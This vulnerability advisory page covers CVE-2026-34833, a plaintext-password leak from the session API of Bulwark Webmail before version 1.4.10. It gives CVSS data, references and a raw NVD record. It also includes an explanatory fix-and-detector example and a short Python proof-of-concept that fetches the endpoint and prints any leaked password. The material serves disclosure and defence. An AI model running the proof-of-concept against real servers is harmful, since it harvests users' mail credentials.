Security Vulnerability Report
CVE-2026-34833 CVSS 7.5 HIGH

Published: 2026-04-02 20:16:27
Last Modified: 2026-04-09 21:13:43

Description

Bulwark Webmail is a self-hosted webmail client for Stalwart Mail Server. Prior to version 1.4.10, the GET /api/auth/session endpoint included the user's plaintext password in the JSON response. This exposed credentials to browser logs, local caches, and network proxies. This issue has been patched in version 1.4.10.
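The pattern behind this advisory, shown as an added example that is not Bulwark Webmail's own code: a session handler that serialises the whole server-side user record (leaking the password) beside a hardened handler that allowlists client-visible fields, plus a recursive JSON check a regression test or proxy-side detector can run over response bodies. The record layout and field names are assumptions.

```python
import json

# Constructed sample of a server-side session record (assumed layout; the real
# Bulwark Webmail structure is not on the page).
SESSION_RECORD = {
    "username": "alice@example.org",
    "password": "correct horse battery staple",  # credential kept for IMAP login
    "display_name": "Alice",
    "session_id": "constructed-session-id",
}

# Vulnerable pattern: dumping the whole record sends every field to the client.
def session_response_vulnerable(record: dict) -> str:
    return json.dumps(record)

# Hardened pattern: only an explicit allowlist of fields reaches the client.
CLIENT_VISIBLE = ("username", "display_name")

def session_response_fixed(record: dict) -> str:
    return json.dumps({k: record[k] for k in CLIENT_VISIBLE if k in record})

# Detection / regression check: list every credential-bearing key in a JSON body,
# matched case-insensitively and recursing through nested objects and arrays.
SECRET_KEYS = {"password", "passwd", "pwd", "secret"}

def leaked_secret_keys(body: str) -> list[str]:
    found: list[str] = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                here = f"{path}.{key}" if path else key
                if key.lower() in SECRET_KEYS:
                    found.append(here)
                walk(value, here)
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")

    walk(json.loads(body), "")
    return found

if __name__ == "__main__":
    print("vulnerable:", leaked_secret_keys(session_response_vulnerable(SESSION_RECORD)))
    print("fixed:     ", leaked_secret_keys(session_response_fixed(SESSION_RECORD)))
```

Wiring leaked_secret_keys into the test suite for every JSON endpoint catches this class of leak before release, independent of which record field happens to carry the credential.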

CVSS Details

CVSS Score: 7.5 (CVSS v3.1, Primary)
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS v4.0 (Secondary): 8.7 HIGH
Weakness: CWE-312 (Cleartext Storage of Sensitive Information)

Configurations (Affected Products)

cpe:2.3:a:bulwarkmail:webmail:*:*:*:*:*:*:*:* - VULNERABLE
Bulwark Webmail < 1.4.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_vulnerability(target_url):
    """
    Checks if the /api/auth/session endpoint leaks the password.
    Note: A valid session cookie might be required depending on configuration.
    """
    endpoint = f"{target_url.rstrip('/')}/api/auth/session"
    # In a real scenario, you might need to capture cookies from a previous login
    # headers = {'Cookie': 'session_id=...'}
    try:
        response = requests.get(endpoint, timeout=10)
        if response.status_code == 200:
            try:
                data = response.json()
                # Check if 'password' key exists in the response
                if 'password' in data:
                    return f"[+] Vulnerability Confirmed! Password leaked: {data['password']}"
                else:
                    return "[-] Password not found in response. System might be patched."
            except ValueError:
                return "[-] Response is not valid JSON."
        else:
            return f"[-] HTTP Status Code: {response.status_code}"
    except Exception as e:
        return f"[!] Error occurred: {str(e)}"


# Usage
# target = "http://localhost:8080"
# print(check_vulnerability(target))

References

https://github.com/bulwarkmail/webmail/releases/tag/1.4.10 (Product)
https://github.com/bulwarkmail/webmail/security/advisories/GHSA-47pm-883h-885r (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34833", "sourceIdentifier": "[email protected]", "published": "2026-04-02T20:16:27.423", "lastModified": "2026-04-09T21:13:42.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bulwark Webmail is a self-hosted webmail client for Stalwart Mail Server. Prior to version 1.4.10, the GET /api/auth/session endpoint previously included the user's plaintext password in the JSON response. This exposed credentials to browser logs, local caches, and network proxie. This issue has been patched in version 1.4.10."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bulwarkmail:webmail:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.10", "matchCriteriaId": "B7AD4211-CACD-4302-8C34-0C0D5B00F576"}]}]}], "references": [{"url": "https://github.com/bulwarkmail/webmail/releases/tag/1.4.10", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/bulwarkmail/webmail/security/advisories/GHSA-47pm-883h-885r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}